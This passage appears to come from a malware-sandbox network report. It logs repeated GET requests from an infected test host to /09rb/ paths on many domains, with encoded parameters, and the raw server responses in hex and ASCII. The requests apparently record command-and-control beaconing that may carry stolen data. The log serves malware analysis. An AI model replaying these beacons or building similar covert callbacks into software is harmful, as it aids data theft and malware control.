Jul 22, 2021 14:11:17.375405073 CEST	4882	IN	Data Raw: 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 46 42 44 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 46 42 44 3b 0a 09 09 09 7d 0a 0a Data Ascii: der {color: #9DAFBD;}::-moz-placeholder {color: #9DAFBD;}:-ms-input-placeholder {color: #9DAFBD;}:-moz-placeholder {color: #9DAFBD;}#wrap {max-width: 560px;margin: 320px auto 12
Jul 22, 2021 14:11:17.375469923 CEST	4883	IN	Data Raw: 31 70 78 20 73 6f 6c 69 64 20 23 32 65 36 36 62 61 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 65 36 36 62 61 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b Data Ascii: 1px solid #2e66ba;background: #2e66ba;color: #fff;box-shadow: none;border-radius: 3px;text-decoration: none;margin-top: 60px;}.btn:hover {border: 1px solid #2e66ba;background-color: #fff;co
Jul 22, 2021 14:11:17.375530958 CEST	4884	IN	Data Raw: 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 62 68 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 77 69 64 67 65 74 20 66 6f 72 6d 20 2e 62 68 2d 69 6e 70 75 74 73 2e 61 63 74 69 76 65 20 7b 0a 09 09 09 09 2d 77 65 62 6b 69 Data Ascii: ease-in-out;}.bh_subscription_widget form .bh-inputs.active {-webkit-transition: all 0.1s ease-in-out;-moz-transition: all 0.1s ease-in-out;-o-transition: all 0.1s ease-in-out;transition: all 0.1s ease-in-out;
Jul 22, 2021 14:11:17.375792980 CEST	4886	IN	Data Raw: 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 31 36 70 78 20 31 35 70 78 20 31 32 70 78 20 31 35 70 78 3b 0a 09 09 09 09 6d 61 78 2d 68 65 69 67 68 74 3a 20 34 35 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 62 68 5f 73 Data Ascii: size: 14px;padding: 16px 15px 12px 15px;max-height: 45px;}.bh_subscription_widget form .bh-inputs.submit input[type="submit"] {background-color: #3575D3;border: none;border-radius: 4px;color: #fff;fo
Jul 22, 2021 14:11:17.375873089 CEST	4887	IN	Data Raw: 70 75 74 73 2c 0a 09 09 09 09 2e 62 68 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 77 69 64 67 65 74 20 66 6f 72 6d 20 2e 62 68 2d 69 6e 70 75 74 73 2e 65 6d 61 69 6c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 2c 0a 09 09 09 09 2e Data Ascii: puts,.bh_subscription_widget form .bh-inputs.email input[type="email"],.bh_subscription_widget form .bh-inputs.submit input[type="submit"] {width: 100%;}.bh_subscription_widget form .bh-inputs.email input[type="email
Jul 22, 2021 14:11:17.375936031 CEST	4888	IN	Data Raw: 2e 68 69 64 65 28 29 3b 0a 0a 09 09 09 09 09 76 61 72 20 65 6d 61 69 6c 20 3d 20 24 28 27 23 73 75 62 73 63 72 69 62 65 2d 66 69 65 6c 64 2d 62 68 27 29 2e 76 61 6c 28 29 3b 0a 09 09 09 09 09 76 61 72 20 6e 6f 6e 63 65 20 3d 20 24 28 27 23 6d 6d Data Ascii: .hide();var email = $('#subscribe-field-bh').val();var nonce = $('#mm_nonce-coming-soon-subscribe').val();var ajaxscript = {ajax_url: 'https://exploring-elle.com/wp-admin/admin-ajax.php'}$.ajax({type: 'POST',
Jul 22, 2021 14:11:17.375983000 CEST	4888	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.11.11	49212	184.168.131.241	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:12:56.239558935 CEST	4956	OUT	GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.zincfacemask.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:12:56.459806919 CEST	4957	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Thu, 22 Jul 2021 12:12:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://www.healthedco.com/Subject/Zinc-Miracle-Mask?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.11.11	49213	72.29.74.90	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:12:59.593116045 CEST	4958	OUT	GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1 Host: www.drlindaydevenish.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:13:00.718346119 CEST	4958	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 22 Jul 2021 12:12:59 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://drlindaydevenish.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Jul 22, 2021 14:13:00.728533983 CEST	4958	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.11.11	49195	204.11.56.48	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:11:30.423361063 CEST	4890	OUT	GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.hypesoleco.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:11:30.656169891 CEST	4892	IN	HTTP/1.1 200 OK Date: Thu, 22 Jul 2021 12:11:30 GMT Server: Apache Set-Cookie: vsid=927vr3745014905236738; expires=Tue, 21-Jul-2026 12:11:30 GMT; Max-Age=157680000; path=/; domain=www.hypesoleco.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CCAAe7T/sjmCIVI0JurR3wRvMAoh0JkCsM5FMzZ18Jnk/T6LRTleWTv2zabZKrEfdKMO/0ShfRjVrFJEcIw/Uw== Keep-Alive: timeout=5, max=125 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 35 63 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 79 70 65 73 6f 6c 65 63 6f 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 79 70 65 73 6f 6c 65 63 6f 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 79 70 65 73 6f 6c 65 63 6f 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 51 30 52 46 51 6a 45 35 64 7a 68 58 51 6b 5a 47 53 6b 46 4f 56 54 6c 51 55 6c 4e 59 51 6d 59 33 54 30 64 51 65 6c 67 30 52 33 4e 6b 54 56 4e 6e 4f 54 42 48 62 55 31 73 59 30 46 70 52 6e 70 4b 64 7a 46 77 51 55 51 30 4e 45 70 33 4d 47 64 4c 55 47 39 75 54 56 70 6b 54 6e 56 5a 62 47 74 44 62 33 46 45 59 6d 34 72 4c 33 6c 35 4e 56 42 6d 5a 33 46 34 4e 7a 52 57 4c 33 46 57 54 6b 70 48 63 44 42 74 65 6b 31 6b 57 54 5a 76 4f 47 73 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 Data Ascii: 5cd9<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.hypesoleco.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.hypesoleco.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.hypesoleco.com/sk-logabpstatus.php?a=Q0RFQjE5dzhXQkZGSkFOVTlQUlNYQmY3T0dQelg0R3NkTVNnOTBHbU1sY0FpRnpKdzFwQUQ0NEp3MGdLUG9uTVpkTnVZbGtDb3FEYm4rL3l5NVBmZ3F4NzRWL3FWTkpHcDBtek1kWTZvOGs9&b="+abp;document.body.appendChild(imglog);if(typeof ab
Jul 22, 2021 14:11:30.656253099 CEST	4893	IN	Data Raw: 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d Data Ascii: perurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='hypesoleco.com' d='entity_mapped'" /><title>Hypesoleco.com</title><meta http-equiv="Content-Type" co
Jul 22, 2021 14:11:30.656313896 CEST	4895	IN	Data Raw: 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 75 62 75 6e 74 75 2d 62 2f 75 62 75 6e 74 75 2d 62 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 32 2e 63 64 6e Data Ascii: age.com/__media__/fonts/ubuntu-b/ubuntu-b.woff") format("woff"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2") format("woff2"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf") format("truetype"),url(
Jul 22, 2021 14:11:30.688786983 CEST	4896	IN	Data Raw: 20 32 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69 32 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 70 69 63 73 2f 31 32 34 37 31 2f 6b 77 62 67 2e 6a 70 67 29 20 6e Data Ascii: 25px 5px;background: url(http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg) no-repeat center center;background-size: cover}.popular-searches ul.first{ list-style: none;width: 380px;margin:0 auto;}.popular-searches ul.last, .related-s
Jul 22, 2021 14:11:30.795268059 CEST	4897	IN	Data Raw: 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 Data Ascii: d-wrap: break-word;font-size: 24px;color: #ffffff;font-family: Arial, Helvetica, sans-serif; display:block;background:url(http://i2.cdn-image.com/__media__/pics/12471/logo.png) no-repeat left center; font-weight: bold; padding: 15px 0px 15px 6
Jul 22, 2021 14:11:30.795351028 CEST	4899	IN	Data Raw: 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 7d 0d 0a 0d 0a 2e 73 72 63 68 42 74 6e 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 32 35 32 38 61 20 75 72 6c 28 68 74 74 Data Ascii: -radius:0;border-radius:0;color: #ffffff}.srchBtn {background: #22528a url(http://i2.cdn-image.com/__media__/pics/12471/search-icon.png) no-repeat center center; border: none; color: #fff; cursor: pointer; float: right; font-size: 14px; he
Jul 22, 2021 14:11:30.795411110 CEST	4900	IN	Data Raw: 62 6f 74 74 6f 6d 3a 20 33 30 70 78 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 6c 69 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 35 70 78 7d 0d 0a 64 69 76 2e 73 65 61 Data Ascii: bottom: 30px}.popular-searches li {margin-bottom: 0px;margin-top: 15px}div.search-form{width: 300px} .srchTxt{width: 250px;font-size: 16px;line-height: 20px} .website .domain{font-size: 23px;padding-top: 19px} .footer-relate
Jul 22, 2021 14:11:30.795470953 CEST	4902	IN	Data Raw: 62 73 69 74 65 7b 6d 61 78 2d 77 69 64 74 68 3a 20 39 35 25 3b 7d 0d 0a 20 20 20 20 2e 73 72 63 68 54 78 74 7b 77 69 64 74 68 3a 20 32 30 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 30 70 Data Ascii: bsite{max-width: 95%;} .srchTxt{width: 200px;font-size: 16px;line-height: 20px} }.content-container{background: none !important}.main-container{border:none !important;height: auto !important}.header{border:none !important;hei

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.11.11	49196	91.195.240.94	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:11:33.702970982 CEST	4903	OUT	GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1 Host: www.electricbrandsusa.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:11:33.743125916 CEST	4903	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.electricbrandsusa.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= Date: Thu, 22 Jul 2021 12:11:33 GMT Content-Length: 173 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6c 65 63 74 72 69 63 62 72 61 6e 64 73 75 73 61 2e 63 6f 6d 2f 30 39 72 62 2f 3f 73 56 7a 3d 6d 54 49 58 4e 48 4b 70 32 76 78 78 4d 26 61 6d 70 3b 35 30 4d 74 6b 68 61 3d 62 45 37 38 4b 32 42 7a 2b 2f 43 58 59 32 6e 51 49 54 57 33 36 72 6e 2b 30 47 72 70 57 56 6c 48 2b 6a 41 62 6a 65 58 71 65 69 30 43 63 49 65 30 49 38 30 5a 71 4e 4c 65 70 4e 63 76 62 62 30 4d 4c 68 45 3d 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.electricbrandsusa.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE=">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.11.11	49197	75.2.26.18	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:11:36.779356003 CEST	4905	OUT	GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.decoratudo.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:11:36.966597080 CEST	4905	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Thu, 22 Jul 2021 12:11:36 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.11.11	49198	154.201.255.27	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:11:40.459381104 CEST	4906	OUT	GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1 Host: www.rshuahui.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:11:40.646723032 CEST	4907	IN	HTTP/1.1 503 Service Temporarily Unavailable Server: nginx Date: Thu, 22 Jul 2021 12:11:40 GMT Content-Type: text/html Content-Length: 190 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>503 Service Temporarily Unavailable</title></head><body><center><h1>503 Service Temporarily Unavailable</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.11.11	49199	34.102.136.180	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:11:43.851167917 CEST	4908	OUT	GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.lidokeyhomes.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:11:43.958415985 CEST	4908	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 22 Jul 2021 12:11:43 GMT Content-Type: text/html Content-Length: 275 ETag: "60f790d8-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.11.11	49200	63.250.34.223	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:11:47.179769993 CEST	4909	OUT	GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1 Host: www.iregentos.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:11:47.345761061 CEST	4910	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 12:11:47 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 280 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 69 72 65 67 65 6e 74 6f 73 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.iregentos.info Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.11.11	49201	66.96.147.113	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:11:51.513475895 CEST	4911	OUT	GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.dutythrow.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:11:51.652160883 CEST	4912	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 12:11:51 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 